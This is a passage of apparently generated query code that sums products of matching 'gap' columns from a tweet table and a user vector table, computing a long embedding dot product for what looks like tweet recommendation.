(tweet_gap.gap_222 * user_surfacing_tweet_vectors.gap_222) +
(tweet_gap.gap_223 * user_surfacing_tweet_vectors.gap_223) +
(tweet_gap.gap_224 * user_surfacing_tweet_vectors.gap_224) +
(tweet_gap.gap_225 * user_surfacing_tweet_vectors.gap_225) +
(tweet_gap.gap_226 * user_surfacing_tweet_vectors.gap_226) +
(tweet_gap.gap_227 * user_surfacing_tweet_vectors.gap_227) +
(tweet_gap.gap_228 * user_surfacing_tweet_vectors.gap_228) +
(tweet_gap.gap_229 * user_surfacing_tweet_vectors.gap_229) +
(tweet_gap.gap_230 * user_surfacing_tweet_vectors.gap_230) +
(tweet_gap.gap_231 * user_surfacing_tweet_vectors.gap_231) +
(tweet_gap.gap_232 * user_surfacing_tweet_vectors.gap_232) +
(tweet_gap.gap_233 * user_surfacing_tweet_vectors.gap_233) +
(tweet_gap.gap_234 * user_surfacing_tweet_vectors.gap_234) +
(tweet_gap.gap_235 * user_surfacing_tweet_vectors.gap_235) +
(tweet_gap.gap_236 * user_surfacing_tweet_vectors.gap_236) +
(tweet_gap.gap_237 * user_surfacing_tweet_vectors.gap_237) +
(tweet_gap.gap_238 * user_surfacing_tweet_vectors.gap_238) +
(tweet_gap.gap_239 * user_surfacing_tweet_vectors.gap_239) +
(tweet_gap.gap_240 * user_surfacing_tweet_vectors.gap_240) +
(tweet_gap.gap_241 * user_surfacing_tweet_vectors.gap_241) +
(tweet_gap.gap_242 * user_surfacing_tweet_vectors.gap_242) +
(tweet_gap.gap_243 * user_surfacing_tweet_vectors.gap_243) +
(tweet_gap.gap_244 * user_surfacing_tweet_vectors.gap_244) +
(tweet_gap.gap_245 * user_surfacing_tweet_vectors.gap_245) +
(tweet_gap.gap_246 * user_surfacing_tweet_vectors.gap_246) +
(tweet_gap.gap_247 * user_surfacing_tweet_vectors.gap_247) +
(tweet_gap.gap_248 * user_surfacing_tweet_vectors.gap_248) +
(tweet_gap.gap_249 * user_surfacing_tweet_vectors.gap_249) +
(tweet_gap.gap_250 * user_surfacing_tweet_vectors.gap_250) +
(tweet_gap.gap_251 * user_surfacing_tweet_vectors.gap_251) +
(tweet_gap.gap_252 * user_surfacing_tweet_vectors.gap_252) +
(tweet_gap.gap_253 * user_surfacing_tweet_vectors.gap_253) +
(tweet_gap.gap_254 * user_surfacing_tweet_vectors.gap_254) +
(tweet_gap.gap_255 * user_surfacing_tweet_vectors.gap_255) +
(tweet_gap.gap_256 * user_surfacing_tweet_vectors.gap_256) +
(tweet_gap.gap_257 * user_surfacing_tweet_vectors.gap_257) +
(tweet_gap.gap_258 * user_surfacing_tweet_vectors.gap_258) +
(tweet_gap.gap_259 * user_surfacing_tweet_vectors.gap_259) +
(tweet_gap.gap_260 * user_surfacing_tweet_vectors.gap_260) +
(tweet_gap.gap_261 * user_surfacing_tweet_vectors.gap_261) +
(tweet_gap.gap_262 * user_surfacing_tweet_vectors.gap_262) +
(tweet_gap.gap_263 * user_surfacing_tweet_vectors.gap_263) +
(tweet_gap.gap_264 * user_surfacing_tweet_vectors.gap_264) +
(tweet_gap.gap_265 * user_surfacing_tweet_vectors.gap_265) +
(tweet_gap.gap_266 * user_surfacing_tweet_vectors.gap_266) +
(tweet_gap.gap_267 * user_surfacing_tweet_vectors.gap_267) +
(tweet_gap.gap_268 * user_surfacing_tweet_vectors.gap_268) +
(tweet_gap.gap_269 * user_surfacing_tweet_vectors.gap_269) +
(tweet_gap.gap_270 * user_surfacing_tweet_vectors.gap_270) +
(tweet_gap.gap_271 * user_surfacing_tweet_vectors.gap_271) +
(tweet_gap.gap_272 * user_surfacing_tweet_vectors.gap_272) +
(tweet_gap.gap_273 * user_surfacing_tweet_vectors.gap_273) +
(tweet_gap.gap_274 * user_surfacing_tweet_vectors.gap_274) +
(tweet_gap.gap_275 * user_surfacing_tweet_vectors.gap_275) +
(tweet_gap.gap_276 * user_surfacing_tweet_vectors.gap_276) +
(tweet_gap.gap_277 * user_surfacing_tweet_vectors.gap_277) +
(tweet_gap.gap_278 * user_surfacing_tweet_vectors.gap_278) +
(tweet_gap.gap_279 * user_surfacing_tweet_vectors.gap_279) +
(tweet_gap.gap_280 * user_surfacing_tweet_vectors.gap_280) +
(tweet_gap.gap_281 * user_surfacing_tweet_vectors.gap_281) +
(tweet_gap.gap_282 * user_surfacing_tweet_vectors.gap_282) +
(tweet_gap.gap_283 * user_surfacing_tweet_vectors.gap_283) +
(tweet_gap.gap_284 * user_surfacing_tweet_vectors.gap_284) +
(tweet_gap.gap_285 * user_surfacing_tweet_vectors.gap_285) +
(tweet_gap.gap_286 * user_surfacing_tweet_vectors.gap_286) +
(tweet_gap.gap_287 * user_surfacing_tweet_vectors.gap_287) +
(tweet_gap.gap_288 * user_surfacing_tweet_vectors.gap_288) +
(tweet_gap.gap_289 * user_surfacing_tweet_vectors.gap_289) +
(tweet_gap.gap_290 * user_surfacing_tweet_vectors.gap_290) +
(tweet_gap.gap_291 * user_surfacing_tweet_vectors.gap_291) +
(tweet_gap.gap_292 * user_surfacing_tweet_vectors.gap_292) +
(tweet_gap.gap_293 * user_surfacing_tweet_vectors.gap_293) +
(tweet_gap.gap_294 * user_surfacing_tweet_vectors.gap_294) +
(tweet_gap.gap_295 * user_surfacing_tweet_vectors.gap_295) +
(tweet_gap.gap_296 * user_surfacing_tweet_vectors.gap_296) +
(tweet_gap.gap_297 * user_surfacing_tweet_vectors.gap_297) +
(tweet_gap.gap_298 * user_surfacing_tweet_vectors.gap_298) +
(tweet_gap.gap_299 * user_surfacing_tweet_vectors.gap_299) +
(tweet_gap.gap_300 * user_surfacing_tweet_vectors.gap_300) +
(tweet_gap.gap_301 * user_surfacing_tweet_vectors.gap_301) +
(tweet_gap.gap_302 * user_surfacing_tweet_vectors.gap_302) +
(tweet_gap.gap_303 * user_surfacing_tweet_vectors.gap_303) +
(tweet_gap.gap_304 * user_surfacing_tweet_vectors.gap_304) +
(tweet_gap.gap_305 * user_surfacing_tweet_vectors.gap_305) +
(tweet_gap.gap_306 * user_surfacing_tweet_vectors.gap_306) +
(tweet_gap.gap_307 * user_surfacing_tweet_vectors.gap_307) +
(tweet_gap.gap_308 * user_surfacing_tweet_vectors.gap_308) +
(tweet_gap.gap_309 * user_surfacing_tweet_vectors.gap_309) +
(tweet_gap.gap_310 * user_surfacing_tweet_vectors.gap_310) +
(tweet_gap.gap_311 * user_surfacing_tweet_vectors.gap_311) +
(tweet_gap.gap_312 * user_surfacing_tweet_vectors.gap_312) +
(tweet_gap.gap_313 * user_surfacing_tweet_vectors.gap_313) +
(tweet_gap.gap_314 * user_surfacing_tweet_vectors.gap_314) +
(tweet_gap.gap_315 * user_surfacing_tweet_vectors.gap_315) +
(tweet_gap.gap_316 * user_surfacing_tweet_vectors.gap_316) +
(tweet_gap.gap_317 * user_surfacing_tweet_vectors.gap_317) +
(tweet_gap.gap_318 * user_surfacing_tweet_vectors.gap_318) +
(tweet_gap.gap_319 * user_surfacing_tweet_vectors.gap_319) +
(tweet_gap.gap_320 * user_surfacing_tweet_vectors.gap_320) +
(tweet_gap.gap_321 * user_surfacing_tweet_vectors.gap_321) +
(tweet_gap.gap_322 * user_surfacing_tweet_vectors.gap_322) +
(tweet_gap.gap_323 * user_surfacing_tweet_vectors.gap_323) +
(tweet_gap.gap_324 * user_surfacing_tweet_vectors.gap_324) +
(tweet_gap.gap_325 * user_surfacing_tweet_vectors.gap_325) +
(tweet_gap.gap_326 * user_surfacing_tweet_vectors.gap_326) +
(tweet_gap.gap_327 * user_surfacing_tweet_vectors.gap_327) +
(tweet_gap.gap_328 * user_surfacing_tweet_vectors.gap_328) +
(tweet_gap.gap_329 * user_surfacing_tweet_vectors.gap_329) +
(tweet_gap.gap_330 * user_surfacing_tweet_vectors.gap_330) +
(tweet_gap.gap_331 * user_surfacing_tweet_vectors.gap_331) +
(tweet_gap.gap_332 * user_surfacing_tweet_vectors.gap_332) +
(tweet_gap.gap_333 * user_surfacing_tweet_vectors.gap_333) +
(tweet_gap.gap_334 * user_surfacing_tweet_vectors.gap_334) +
(tweet_gap.gap_335 * user_surfacing_tweet_vectors.gap_335) +
(tweet_gap.gap_336 * user_surfacing_tweet_vectors.gap_336) +
(tweet_gap.gap_337 * user_surfacing_tweet_vectors.gap_337) +
(tweet_gap.gap_338 * user_surfacing_tweet_vectors.gap_338) +
(tweet_gap.gap_339 * user_surfacing_tweet_vectors.gap_339) +
(tweet_gap.gap_340 * user_surfacing_tweet_vectors.gap_340) +
(tweet_gap.gap_341 * user_surfacing_tweet_vectors.gap_341) +
(tweet_gap.gap_342 * user_surfacing_tweet_vectors.gap_342) +
(tweet_gap.gap_343 * user_surfacing_tweet_vectors.gap_343) +
(tweet_gap.gap_344 * user_surfacing_tweet_vectors.gap_344) +
(tweet_gap.gap_345 * user_surfacing_tweet_vectors.gap_345) +
(tweet_gap.gap_346 * user_surfacing_tweet_vectors.gap_346) +
(tweet_gap.gap_347 * user_surfacing_tweet_vectors.gap_347) +
(tweet_gap.gap_348 * user_surfacing_tweet_vectors.gap_348) +
(tweet_gap.gap_349 * user_surfacing_tweet_vectors.gap_349) +
(tweet_gap.gap_350 * user_surfacing_tweet_vectors.gap_350) +
(tweet_gap.gap_351 * user_surfacing_tweet_vectors.gap_351) +
(tweet_gap.gap_352 * user_surfacing_tweet_vectors.gap_352) +
(tweet_gap.gap_353 * user_surfacing_tweet_vectors.gap_353) +
(tweet_gap.gap_354 * user_surfacing_tweet_vectors.gap_354) +
(tweet_gap.gap_355 * user_surfacing_tweet_vectors.gap_355) +
(tweet_gap.gap_356 * user_surfacing_tweet_vectors.gap_356) +
(tweet_gap.gap_357 * user_surfacing_tweet_vectors.gap_357) +
(tweet_gap.gap_358 * user_surfacing_tweet_vectors.gap_358) +
(tweet_gap.gap_359 * user_surfacing_tweet_vectors.gap_359) +
(tweet_gap.gap_360 * user_surfacing_tweet_vectors.gap_360) +
(tweet_gap.gap_361 * user_surfacing_tweet_vectors.gap_361) +
(tweet_gap.gap_362 * user_surfacing_tweet_vectors.gap_362) +
(tweet_gap.gap_363 * user_surfacing_tweet_vectors.gap_363) +
(tweet_gap.gap_364 * user_surfacing_tweet_vectors.gap_364) +
(tweet_gap.gap_365 * user_surfacing_tweet_vectors.gap_365) +
(tweet_gap.gap_366 * user_surfacing_tweet_vectors.gap_366) +
(tweet_gap.gap_367 * user_surfacing_tweet_vectors.gap_367) +
(tweet_gap.gap_368 * user_surfacing_tweet_vectors.gap_368) +
(tweet_gap.gap_369 * user_surfacing_tweet_vectors.gap_369) +
(tweet_gap.gap_370 * user_surfacing_tweet_vectors.gap_370) +
(tweet_gap.gap_371 * user_surfacing_tweet_vectors.gap_371) +
(tweet_gap.gap_372 * user_surfacing_tweet_vectors.gap_372) +
(tweet_gap.gap_373 * user_surfacing_tweet_vectors.gap_373) +
(tweet_gap.gap_374 * user_surfacing_tweet_vectors.gap_374) +
(tweet_gap.gap_375 * user_surfacing_tweet_vectors.gap_375) +
(tweet_gap.gap_376 * user_surfacing_tweet_vectors.gap_376) +
(tweet_gap.gap_377 * user_surfacing_tweet_vectors.gap_377) +
(tweet_gap.gap_378 * user_surfacing_tweet_vectors.gap_378) +
(tweet_gap.gap_379 * user_surfacing_tweet_vectors.gap_379) +
(tweet_gap.gap_380 * user_surfacing_tweet_vectors.gap_380) +
(tweet_gap.gap_381 * user_surfacing_tweet_vectors.gap_381) +
(tweet_gap.gap_382 * user_surfacing_tweet_vectors.gap_382) +
(tweet_gap.gap_383 * user_surfacing_tweet_vectors.gap_383) +
(tweet_gap.gap_384 * user_surfacing_tweet_vectors.gap_384) +
(tweet_gap.gap_385 * user_surfacing_tweet_vectors.gap_385) +
(tweet_gap.gap_386 * user_surfacing_tweet_vectors.gap_386) +
(tweet_gap.gap_387 * user_surfacing_tweet_vectors.gap_387) +
(tweet_gap.gap_388 * user_surfacing_tweet_vectors.gap_388) +
(tweet_gap.gap_389 * user_surfacing_tweet_vectors.gap_389) +
(tweet_gap.gap_390 * user_surfacing_tweet_vectors.gap_390) +
(tweet_gap.gap_391 * user_surfacing_tweet_vectors.gap_391) +
(tweet_gap.gap_392 * user_surfacing_tweet_vectors.gap_392) +
(tweet_gap.gap_393 * user_surfacing_tweet_vectors.gap_393) +
(tweet_gap.gap_394 * user_surfacing_tweet_vectors.gap_394) +
(tweet_gap.gap_395 * user_surfacing_tweet_vectors.gap_395) +
(tweet_gap.gap_396 * user_surfacing_tweet_vectors.gap_396) +
(tweet_gap.gap_397 * user_surfacing_tweet_vectors.gap_397) +
(tweet_gap.gap_398 * user_surfacing_tweet_vectors.gap_398) +
(tweet_gap.gap_399 * user_surfacing_tweet_vectors.gap_399) +
(tweet_gap.gap_400 * user_surfacing_tweet_vectors.gap_400) +
(tweet_gap.gap_401 * user_surfacing_tweet_vectors.gap_401) +
(tweet_gap.gap_402 * user_surfacing_tweet_vectors.gap_402) +
(tweet_gap.gap_403 * user_surfacing_tweet_vectors.gap_403) +
(tweet_gap.gap_404 * user_surfacing_tweet_vectors.gap_404) +
(tweet_gap.gap_405 * user_surfacing_tweet_vectors.gap_405) +
(tweet_gap.gap_406 * user_surfacing_tweet_vectors.gap_406) +
(tweet_gap.gap_407 * user_surfacing_tweet_vectors.gap_407) +
(tweet_gap.gap_408 * user_surfacing_tweet_vectors.gap_408) +
(tweet_gap.gap_409 * user_surfacing_tweet_vectors.gap_409) +
(tweet_gap.gap_410 * user_surfacing_tweet_vectors.gap_410) +
(tweet_gap.gap_411 * user_surfacing_tweet_vectors.gap_411) +
(tweet_gap.gap_412 * user_surfacing_tweet_vectors.gap_412) +
(tweet_gap.gap_413 * user_surfacing_tweet_vectors.gap_413) +
(tweet_gap.gap_414 * user_surfacing_tweet_vectors.gap_414) +
(tweet_gap.gap_415 * user_surfacing_tweet_vectors.gap_415) +
(tweet_gap.gap_416 * user_surfacing_tweet_vectors.gap_416) +
(tweet_gap.gap_417 * user_surfacing_tweet_vectors.gap_417) +
(tweet_gap.gap_418 * user_surfacing_tweet_vectors.gap_418) +
(tweet_gap.gap_419 * user_surfacing_tweet_vectors.gap_419) +
(tweet_gap.gap_420 * user_surfacing_tweet_vectors.gap_420) +
(tweet_gap.gap_421 * user_surfacing_tweet_vectors.gap_421) +
(tweet_gap.gap_422 * user_surfacing_tweet_vectors.gap_422) +
(tweet_gap.gap_423 * user_surfacing_tweet_vectors.gap_423) +
(tweet_gap.gap_424 * user_surfacing_tweet_vectors.gap_424) +
(tweet_gap.gap_425 * user_surfacing_tweet_vectors.gap_425) +
(tweet_gap.gap_426 * user_surfacing_tweet_vectors.gap_426) +
(tweet_gap.gap_427 * user_surfacing_tweet_vectors.gap_427) +
(tweet_gap.gap_428 * user_surfacing_tweet_vectors.gap_428) +
(tweet_gap.gap_429 * user_surfacing_tweet_vectors.gap_429) +
(tweet_gap.gap_430 * user_surfacing_tweet_vectors.gap_430) +
(tweet_gap.gap_431 * user_surfacing_tweet_vectors.gap_431) +
(tweet_gap.gap_432 * user_surfacing_tweet_vectors.gap_432) +
(tweet_gap.gap_433 * user_surfacing_tweet_vectors.gap_433) +
(tweet_gap.gap_434 * user_surfacing_tweet_vectors.gap_434) +
(tweet_gap.gap_435 * user_surfacing_tweet_vectors.gap_435) +
(tweet_gap.gap_436 * user_surfacing_tweet_vectors.gap_436) +
(tweet_gap.gap_437 * user_surfacing_tweet_vectors.gap_437) +
(tweet_gap.gap_438 * user_surfacing_tweet_vectors.gap_438) +
(tweet_gap.gap_439 * user_surfacing_tweet_vectors.gap_439) +
(tweet_gap.gap_440 * user_surfacing_tweet_vectors.gap_440) +
(tweet_gap.gap_441 * user_surfacing_tweet_vectors.gap_441) +
(tweet_gap.gap_442 * user_surfacing_tweet_vectors.gap_442) +
(tweet_gap.gap_443 * user_surfacing_tweet_vectors.gap_443) +
(tweet_gap.gap_444 * user_surfacing_tweet_vectors.gap_444) +
(tweet_gap.gap_445 * user_surfacing_tweet_vectors.gap_445) +
(tweet_gap.gap_446 * user_surfacing_tweet_vectors.gap_446) +
(tweet_gap.gap_447 * user_surfacing_tweet_vectors.gap_447) +
(tweet_gap.gap_448 * user_surfacing_tweet_vectors.gap_448) +
(tweet_gap.gap_449 * user_surfacing_tweet_vectors.gap_449) +
(tweet_gap.gap_450 * user_surfacing_tweet_vectors.gap_450) +
(tweet_gap.gap_451 * user_surfacing_tweet_vectors.gap_451) +
(tweet_gap.gap_452 * user_surfacing_tweet_vectors.gap_452) +
(tweet_gap.gap_453 * user_surfacing_tweet_vectors.gap_453) +
(tweet_gap.gap_454 * user_surfacing_tweet_vectors.gap_454) +
(tweet_gap.gap_455 * user_surfacing_tweet_vectors.gap_455) +
(tweet_gap.gap_456 * user_surfacing_tweet_vectors.gap_456) +
(tweet_gap.gap_457 * user_surfacing_tweet_vectors.gap_457) +
(tweet_gap.gap_458 * user_surfacing_tweet_vectors.gap_458) +
(tweet_gap.gap_459 * user_surfacing_tweet_vectors.gap_459) +
(tweet_gap.gap_460 * user_surfacing_tweet_vectors.gap_460) +
(tweet_gap.gap_461 * user_surfacing_tweet_vectors.gap_461) +
(tweet_gap.gap_462 * user_surfacing_tweet_vectors.gap_462) +
(tweet_gap.gap_463 * user_surfacing_tweet_vectors.gap_463) +
(tweet_gap.gap_464 * user_surfacing_tweet_vectors.gap_464) +
(tweet_gap.gap_465 * user_surfacing_tweet_vectors.gap_465) +
(tweet_gap.gap_466 * user_surfacing_tweet_vectors.gap_466) +
(tweet_gap.gap_467 * user_surfacing_tweet_vectors.gap_467) +
(tweet_gap.gap_468 * user_surfacing_tweet_vectors.gap_468) +
(tweet_gap.gap_469 * user_surfacing_tweet_vectors.gap_469) +
(tweet_gap.gap_470 * user_surfacing_tweet_vectors.gap_470) +
(tweet_gap.gap_471 * user_surfacing_tweet_vectors.gap_471) +
(tweet_gap.gap_472 * user_surfacing_tweet_vectors.gap_472) +
(tweet_gap.gap_473 * user_surfacing_tweet_vectors.gap_473) +
(tweet_gap.gap_474 * user_surfacing_tweet_vectors.gap_474) +
(tweet_gap.gap_475 * user_surfacing_tweet_vectors.gap_475) +
(tweet_gap.gap_476 * user_surfacing_tweet_vectors.gap_476) +
(tweet_gap.gap_477 * user_surfacing_tweet_vectors.gap_477) +
(tweet_gap.gap_478 * user_surfacing_tweet_vectors.gap_478) +
(tweet_gap.gap_479 * user_surfacing_tweet_vectors.gap_479) +
(tweet_gap.gap_480 * user_surfacing_tweet_vectors.gap_480) +
(tweet_gap.gap_481 * user_surfacing_tweet_vectors.gap_481) +
(tweet_gap.gap_482 * user_surfacing_tweet_vectors.gap_482) +
(tweet_gap.gap_483 * user_surfacing_tweet_vectors.gap_483) +
(tweet_gap.gap_484 * user_surfacing_tweet_vectors.gap_484) +
(tweet_gap.gap_485 * user_surfacing_tweet_vectors.gap_485) +
(tweet_gap.gap_486 * user_surfacing_tweet_vectors.gap_486) +
(tweet_gap.gap_487 * user_surfacing_tweet_vectors.gap_487) +
(tweet_gap.gap_488 * user_surfacing_tweet_vectors.gap_488) +
(tweet_gap.gap_489 * user_surfacing_tweet_vectors.gap_489) +
(tweet_gap.gap_490 * user_surfacing_tweet_vectors.gap_490) +
(tweet_gap.gap_491 * user_surfacing_tweet_vectors.gap_491) +
(tweet_gap.gap_492 * user_surfacing_tweet_vectors.gap_492) +
(tweet_gap.gap_493 * user_surfacing_tweet_vectors.gap_493) +
(tweet_gap.gap_494 * user_surfacing_tweet_vectors.gap_494) +
(tweet_gap.gap_495 * user_surfacing_tweet_vectors.gap_495) +
(tweet_gap.gap_496 * user_surfacing_tweet_vectors.gap_496) +
(tweet_gap.gap_497 * user_surfacing_tweet_vectors.gap_497) +
(tweet_gap.gap_498 * user_surfacing_tweet_vectors.gap_498) +
(tweet_gap.gap_499 * user_surfacing_tweet_vectors.gap_499) +
(tweet_gap.gap_500 * user_surfacing_tweet_vectors.gap_500) +
(tweet_gap.gap_501 * user_surfacing_tweet_vectors.gap_501) +
(tweet_gap.gap_502 * user_surfacing_tweet_vectors.gap_502) +
(tweet_gap.gap_503 * user_surfacing_tweet_vectors.gap_503) +
(tweet_gap.gap_504 * user_surfacing_tweet_vectors.gap_504) +
(tweet_gap.gap_505 * user_surfacing_tweet_vectors.gap_505) +
(tweet_gap.gap_506 * user_surfacing_tweet_vectors.gap_506) +
(tweet_gap.gap_507 * user_surfacing_tweet_vectors.gap_507) +
(tweet_gap.gap_508 * user_surfacing_tweet_vectors.gap_508) +
(tweet_gap.gap_509 * user_surfacing_tweet_vectors.gap_509) +
(tweet_gap.gap_510 * user_surfacing_tweet_vectors.gap_510) +
(tweet_gap.gap_511 * user_surfacing_tweet_vectors.gap_511) +
(tweet_gap.gap_512 * user_surfacing_tweet_vectors.gap_512) +
(tweet_gap.gap_513 * user_surfacing_tweet_vectors.gap_513) +
(tweet_gap.gap_514 * user_surfacing_tweet_vectors.gap_514) +
(tweet_gap.gap_515 * user_surfacing_tweet_vectors.gap_515) +
(tweet_gap.gap_516 * user_surfacing_tweet_vectors.gap_516) +
(tweet_gap.gap_517 * user_surfacing_tweet_vectors.gap_517) +
(tweet_gap.gap_518 * user_surfacing_tweet_vectors.gap_518) +
(tweet_gap.gap_519 * user_surfacing_tweet_vectors.gap_519) +
(tweet_gap.gap_520 * user_surfacing_tweet_vectors.gap_520) +
(tweet_gap.gap_521 * user_surfacing_tweet_vectors.gap_521) +
(tweet_gap.gap_522 * user_surfacing_tweet_vectors.gap_522) +
(tweet_gap.gap_523 * user_surfacing_tweet_vectors.gap_523) +
(tweet_gap.gap_524 * user_surfacing_tweet_vectors.gap_524) +
(tweet_gap.gap_525 * user_surfacing_tweet_vectors.gap_525) +
(tweet_gap.gap_526 * user_surfacing_tweet_vectors.gap_526) +
(tweet_gap.gap_527 * user_surfacing_tweet_vectors.gap_527) +
(tweet_gap.gap_528 * user_surfacing_tweet_vectors.gap_528) +
(tweet_gap.gap_529 * user_surfacing_tweet_vectors.gap_529) +
(tweet_gap.gap_530 * user_surfacing_tweet_vectors.gap_530) +
(tweet_gap.gap_531 * user_surfacing_tweet_vectors.gap_531) +
(tweet_gap.gap_532 * user_surfacing_tweet_vectors.gap_532) +
(tweet_gap.gap_533 * user_surfacing_tweet_vectors.gap_533) +
(tweet_gap.gap_534 * user_surfacing_tweet_vectors.gap_534) +
(tweet_gap.gap_535 * user_surfacing_tweet_vectors.gap_535) +
(tweet_gap.gap_536 * user_surfacing_tweet_vectors.gap_536) +
(tweet_gap.gap_537 * user_surfacing_tweet_vectors.gap_537) +
(tweet_gap.gap_538 * user_surfacing_tweet_vectors.gap_538) +
(tweet_gap.gap_539 * user_surfacing_tweet_vectors.gap_539) +
(tweet_gap.gap_540 * user_surfacing_tweet_vectors.gap_540) +
(tweet_gap.gap_541 * user_surfacing_tweet_vectors.gap_541) +
(tweet_gap.gap_542 * user_surfacing_tweet_vectors.gap_542) +
(tweet_gap.gap_543 * user_surfacing_tweet_vectors.gap_543) +
(tweet_gap.gap_544 * user_surfacing_tweet_vectors.gap_544) +
(tweet_gap.gap_545 * user_surfacing_tweet_vectors.gap_545) +
(tweet_gap.gap_546 * user_surfacing_tweet_vectors.gap_546) +
(tweet_gap.gap_547 * user_surfacing_tweet_vectors.gap_547) +
(tweet_gap.gap_548 * user_surfacing_tweet_vectors.gap_548) +
(tweet_gap.gap_549 * user_surfacing_tweet_vectors.gap_549) +
(tweet_gap.gap_550 * user_surfacing_tweet_vectors.gap_550) +
(tweet_gap.gap_551 * user_surfacing_tweet_vectors.gap_551) +
(tweet_gap.gap_552 * user_surfacing_tweet_vectors.gap_552) +
(tweet_gap.gap_553 * user_surfacing_tweet_vectors.gap_553) +
(tweet_gap.gap_554 * user_surfacing_tweet_vectors.gap_554) +
(tweet_gap.gap_555 * user_surfacing_tweet_vectors.gap_555) +
(tweet_gap.gap_556 * user_surfacing_tweet_vectors.gap_556) +
(tweet_gap.gap_557 * user_surfacing_tweet_vectors.gap_557) +
(tweet_gap.gap_558 * user_surfacing_tweet_vectors.gap_558) +
(tweet_gap.gap_559 * user_surfacing_tweet_vectors.gap_559) +
(tweet_gap.gap_560 * user_surfacing_tweet_vectors.gap_560) +
(tweet_gap.gap_561 * user_surfacing_tweet_vectors.gap_561) +
(tweet_gap.gap_562 * user_surfacing_tweet_vectors.gap_562) +
(tweet_gap.gap_563 * user_surfacing_tweet_vectors.gap_563) +
(tweet_gap.gap_564 * user_surfacing_tweet_vectors.gap_564) +
(tweet_gap.gap_565 * user_surfacing_tweet_vectors.gap_565) +
(tweet_gap.gap_566 * user_surfacing_tweet_vectors.gap_566) +
(tweet_gap.gap_567 * user_surfacing_tweet_vectors.gap_567) +
(tweet_gap.gap_568 * user_surfacing_tweet_vectors.gap_568) +
(tweet_gap.gap_569 * user_surfacing_tweet_vectors.gap_569) +
(tweet_gap.gap_570 * user_surfacing_tweet_vectors.gap_570) +
(tweet_gap.gap_571 * user_surfacing_tweet_vectors.gap_571) +
(tweet_gap.gap_572 * user_surfacing_tweet_vectors.gap_572) +
(tweet_gap.gap_573 * user_surfacing_tweet_vectors.gap_573) +
(tweet_gap.gap_574 * user_surfacing_tweet_vectors.gap_574) +
(tweet_gap.gap_575 * user_surfacing_tweet_vectors.gap_575) +
(tweet_gap.gap_576 * user_surfacing_tweet_vectors.gap_576) +
(tweet_gap.gap_577 * user_surfacing_tweet_vectors.gap_577) +
(tweet_gap.gap_578 * user_surfacing_tweet_vectors.gap_578) +
(tweet_gap.gap_579 * user_surfacing_tweet_vectors.gap_579) +
(tweet_gap.gap_580 * user_surfacing_tweet_vectors.gap_580) +
(tweet_gap.gap_581 * user_surfacing_tweet_vectors.gap_581) +
(tweet_gap.gap_582 * user_surfacing_tweet_vectors.gap_582) +
(tweet_gap.gap_583 * user_surfacing_tweet_vectors.gap_583) +
(tweet_gap.gap_584 * user_surfacing_tweet_vectors.gap_584) +
(tweet_gap.gap_585 * user_surfacing_tweet_vectors.gap_585) +
(tweet_gap.gap_586 * user_surfacing_tweet_vectors.gap_586) +
(tweet_gap.gap_587 * user_surfacing_tweet_vectors.gap_587) +
(tweet_gap.gap_588 * user_surfacing_tweet_vectors.gap_588) +
(tweet_gap.gap_589 * user_surfacing_tweet_vectors.gap_589) +
(tweet_gap.gap_590 * user_surfacing_tweet_vectors.gap_590) +
(tweet_gap.gap_591 * user_surfacing_tweet_vectors.gap_591) +
(tweet_gap.gap_592 * user_surfacing_tweet_vectors.gap_592) +
(tweet_gap.gap_593 * user_surfacing_tweet_vectors.gap_593) +
(tweet_gap.gap_594 * user_surfacing_tweet_vectors.gap_594) +
(tweet_gap.gap_595 * user_surfacing_tweet_vectors.gap_595) +
(tweet_gap.gap_596 * user_surfacing_tweet_vectors.gap_596) +
(tweet_gap.gap_597 * user_surfacing_tweet_vectors.gap_597) +
(tweet_gap.gap_598 * user_surfacing_tweet_vectors.gap_598) +
(tweet_gap.gap_599 * user_surfacing_tweet_vectors.gap_599) +
(tweet_gap.gap_600 * user_surfacing_tweet_vectors.gap_600) +
(tweet_gap.gap_601 * user_surfacing_tweet_vectors.gap_601) +
(tweet_gap.gap_602 * user_surfacing_tweet_vectors.gap_602) +
(tweet_gap.gap_603 * user_surfacing_tweet_vectors.gap_603) +
(tweet_gap.gap_604 * user_surfacing_tweet_vectors.gap_604) +
(tweet_gap.gap_605 * user_surfacing_tweet_vectors.gap_605) +
(tweet_gap.gap_606 * user_surfacing_tweet_vectors.gap_606) +
(tweet_gap.gap_607 * user_surfacing_tweet_vectors.gap_607) +
(tweet_gap.gap_608 * user_surfacing_tweet_vectors.gap_608) +
(tweet_gap.gap_609 * user_surfacing_tweet_vectors.gap_609) +
(tweet_gap.gap_610 * user_surfacing_tweet_vectors.gap_610) +
(tweet_gap.gap_611 * user_surfacing_tweet_vectors.gap_611) +
(tweet_gap.gap_612 * user_surfacing_tweet_vectors.gap_612) +
(tweet_gap.gap_613 * user_surfacing_tweet_vectors.gap_613) +
(tweet_gap.gap_614 * user_surfacing_tweet_vectors.gap_614) +
(tweet_gap.gap_615 * user_surfacing_tweet_vectors.gap_615) +
(tweet_gap.gap_616 * user_surfacing_tweet_vectors.gap_616) +
(tweet_gap.gap_617 * user_surfacing_tweet_vectors.gap_617) +
(tweet_gap.gap_618 * user_surfacing_tweet_vectors.gap_618) +
(tweet_gap.gap_619 * user_surfacing_tweet_vectors.gap_619) +
(tweet_gap.gap_620 * user_surfacing_tweet_vectors.gap_620) +
(tweet_gap.gap_621 * user_surfacing_tweet_vectors.gap_621) +
(tweet_gap.gap_622 * user_surfacing_tweet_vectors.gap_622) +
(tweet_gap.gap_623 * user_surfacing_tweet_vectors.gap_623) +
(tweet_gap.gap_624 * user_surfacing_tweet_vectors.gap_624) +
(tweet_gap.gap_625 * user_surfacing_tweet_vectors.gap_625) +
(tweet_gap.gap_626 * user_surfacing_tweet_vectors.gap_626) +
(tweet_gap.gap_627 * user_surfacing_tweet_vectors.gap_627) +
(tweet_gap.gap_628 * user_surfacing_tweet_vectors.gap_628) +
(tweet_gap.gap_629 * user_surfacing_tweet_vectors.gap_629) +
(tweet_gap.gap_630 * user_surfacing_tweet_vectors.gap_630) +
(tweet_gap.gap_631 * user_surfacing_tweet_vectors.gap_631) +
(tweet_gap.gap_632 * user_surfacing_tweet_vectors.gap_632) +
(tweet_gap.gap_633 * user_surfacing_tweet_vectors.gap_633) +
(tweet_gap.gap_634 * user_surfacing_tweet_vectors.gap_634) +
(tweet_gap.gap_635 * user_surfacing_tweet_vectors.gap_635) +
(tweet_gap.gap_636 * user_surfacing_tweet_vectors.gap_636) +
(tweet_gap.gap_637 * user_surfacing_tweet_vectors.gap_637) +
